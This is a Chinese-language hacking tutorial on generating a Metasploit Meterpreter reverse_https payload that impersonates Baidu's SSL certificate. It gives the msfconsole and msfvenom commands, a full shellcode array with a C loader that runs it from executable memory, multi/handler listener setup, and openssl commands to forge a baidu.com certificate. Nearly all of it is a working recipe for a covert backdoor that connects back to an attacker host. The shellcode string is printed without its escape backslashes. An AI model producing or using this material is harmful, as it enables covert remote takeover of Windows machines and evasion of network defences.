Metasploit 生成带SSL加密载荷

1.下载证书。Impersonate_SSL模块，下载指定网站的证书。

msf6> use auxiliary/gather/impersonate_ssl
msf6 auxiliary(gather/impersonate_ssl) > set rhost  www.baidu.com
msf6 auxiliary(gather/impersonate_ssl) > run

得到：/root/.msf4/loot/20210629003816_default_110.242.68.4_110.242.68.4_pem_993753.pem

2.生成带有ssl证书的shellcode代码。

msf auxiliary(impersonate_ssl) > use payload/windows/meterpreter/reverse_https
msf payload(reverse_https) > set STAGERVERIFYSSLCERT true
msf payload(reverse_https) > set HANDLERSSLCERT /root/.msf4/loot/20210629003816_default_110.242.68.4_110.242.68.4_pem_993753.pem
msf payload(reverse_https) > set LHOST 192.168.140.128
msf payload(reverse_https) > set LPORT 8443
msf6 payload > generate -f c -o /root/shell.c

3.打开生成文件，然后加入到shellcode执行盒中。

#include <Windows.h>
#include <stdio.h>
#pragma comment(linker, "/section:.data,RWE")

unsigned char buf[] = 
"xfcxe8x8fx00x00x00x60x89xe5x31xd2x64x8bx52x30"
"x8bx52x0cx8bx52x14x8bx72x28x0fxb7x4ax26x31xff"
"x31xc0xacx3cx61x7cx02x2cx20xc1xcfx0dx01xc7x49"
"x75xefx52x8bx52x10x57x8bx42x3cx01xd0x8bx40x78"
"x85xc0x74x4cx01xd0x8bx48x18x8bx58x20x50x01xd3"
"x85xc9x74x3cx31xffx49x8bx34x8bx01xd6x31xc0xac"
"xc1xcfx0dx01xc7x38xe0x75xf4x03x7dxf8x3bx7dx24"
"x75xe0x58x8bx58x24x01xd3x66x8bx0cx4bx8bx58x1c"
"x01xd3x8bx04x8bx01xd0x89x44x24x24x5bx5bx61x59"
"x5ax51xffxe0x58x5fx5ax8bx12xe9x80xffxffxffx5d"
"x68x6ex65x74x00x68x77x69x6ex69x54x68x4cx77x26"
"x07xffxd5x31xdbx53x53x53x53x53xe8x3ex00x00x00"
"x4dx6fx7ax69x6cx6cx61x2fx35x2ex30x20x28x57x69"
"x6ex64x6fx77x73x20x4ex54x20x36x2ex31x3bx20x54"
"x72x69x64x65x6ex74x2fx37x2ex30x3bx20x72x76x3a"
"x31x31x2ex30x29x20x6cx69x6bx65x20x47x65x63x6b"
"x6fx00x68x3ax56x79xa7xffxd5x53x53x6ax03x53x53"
"x68xfbx20x00x00xe8x6ax01x00x00x2fx72x6ax5fx79"
"x6dx73x34x4bx4fx74x6dx72x59x61x70x67x79x37x73"
"x50x52x41x4fx65x44x6dx76x68x35x64x4dx46x5fx32"
"x34x6bx44x5ax6dx79x43x65x69x32x33x55x75x66x58"
"x68x55x41x33x54x62x43x32x6ax70x5ax43x49x5fx64"
"x47x65x32x70x54x69x5ax63x79x76x68x53x6ax5fx37"
"x51x58x5fx73x68x33x62x67x44x36x6ax66x69x32x46"
"x55x63x4ax65x6ax70x4dx74x56x53x51x67x6fx30x67"
"x48x4ax46x4ax6cx36x54x52x33x78x55x6cx6fx44x70"
"x62x36x5ax31x68x34x32x4ax37x6dx35x50x5fx54x79"
"x67x44x4dx41x4fx71x6ex65x52x48x39x35x53x5ax4c"
"x54x66x57x58x74x45x4ax38x75x6dx2dx4ex55x62x6f"
"x78x66x59x58x55x34x46x76x62x48x59x35x30x6cx6b"
"x4fx67x48x42x43x39x4ax4bx41x75x38x41x6cx37x69"
"x39x51x76x4ex30x65x6dx37x54x70x43x5ax65x6bx4b"
"x72x4bx4fx00x50x68x57x89x9fxc6xffxd5x89xc6x53"
"x68x00x32xe8x84x53x53x53x57x53x56x68xebx55x2e"
"x3bxffxd5x96x6ax0ax5fx68x80x33x00x00x89xe0x6a"
"x04x50x6ax1fx56x68x75x46x9ex86xffxd5x53x53x53"
"x53x56x68x2dx06x18x7bxffxd5x85xc0x75x14x68x88"
"x13x00x00x68x44xf0x35xe0xffxd5x4fx75xcdxe8x4c"
"x00x00x00x6ax40x68x00x10x00x00x68x00x00x40x00"
"x53x68x58xa4x53xe5xffxd5x93x53x53x89xe7x57x68"
"x00x20x00x00x53x56x68x12x96x89xe2xffxd5x85xc0"
"x74xcfx8bx07x01xc3x85xc0x75xe5x58xc3x5fxe8x6b"
"xffxffxffx31x39x32x2ex31x36x38x2ex31x34x30x2e"
"x31x32x38x00xbbxf0xb5xa2x56x6ax00x53xffxd5";
typedef void(__stdcall* CODE) ();

int main()
{
    //((void(*)(void))&buf)();
    PVOID pFunction = NULL;
    pFunction = VirtualAlloc(0, sizeof(buf), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    memcpy(pFunction, buf, sizeof(buf));
    CODE StartShell = (CODE)pFunction;
    StartShell();
}

4.建立侦听

use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_https
msf exploit(handler) > set HANDLERSSLCERT  /root/.msf4/loot/20210629003816_default_110.242.68.4_110.242.68.4_pem_993753.pem
msf exploit(handler) > set STAGERVERIFYSSLCERT true
msf exploit(handler) > set LPORT 8443
msf exploit(handler) > set LHOST 192.168.140.128
msf exploit(handler) > run -j

确保网站可以打开。

运行后即可上线。

---

如果需要自己制作证书，则可以使用，脚本生成。

#!/bin/bash
clear
read -p "Password:" PASS
echo "创建AES256加密密钥..."
openssl genrsa -passout pass:${PASS} -out rsa_aes_private.pem 2048
echo "生成公钥..."
openssl rsa -in rsa_aes_private.pem -passin pass:${PASS} -pubout -out rsa_public.pem
echo "PEM私钥转DER..."
openssl rsa -in rsa_aes_private.pem -passin pass:${PASS} -out rsa_private_key.der -outform der 
echo "PEM公钥转DER..."
openssl rsa -in rsa_public.pem -out rsa_public_key.der -pubin -outform der 
echo "Finish!"

1.通过openssl伪造证书

openssl req -new -newkey rsa:4096 -days 365 -nodes -x509 -subj "/C=UK/ST=London/L=London/O=Development/CN=www.baidu.com" -keyout www.baidu.com.key -out www.baidu.com.crt
cat www.baidu.com.key www.baidu.com.crt > www.baidu.com.pem
rm -rf www.baidu.com.key www.baidu.com.crt

2.非交互生成shellcode

msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.140.128 LPORT=8443 PayloadUUIDTracking=true PayloadUUIDName=Whoamishell HandlerSSLCert=/root/test/www.baidu.com.pem StagerVerifySSLCert=true -f c -o /root/test.c

3.启动侦听

use exploit/multi/handler
set payload windows/meterpreter/reverse_https
set LHOST 192.168.140.128
set LPORT 8443
set HandlerSSLCert /root/test/www.baidu.com.pem
set StagerVerifySSLCert true
exploit -j -z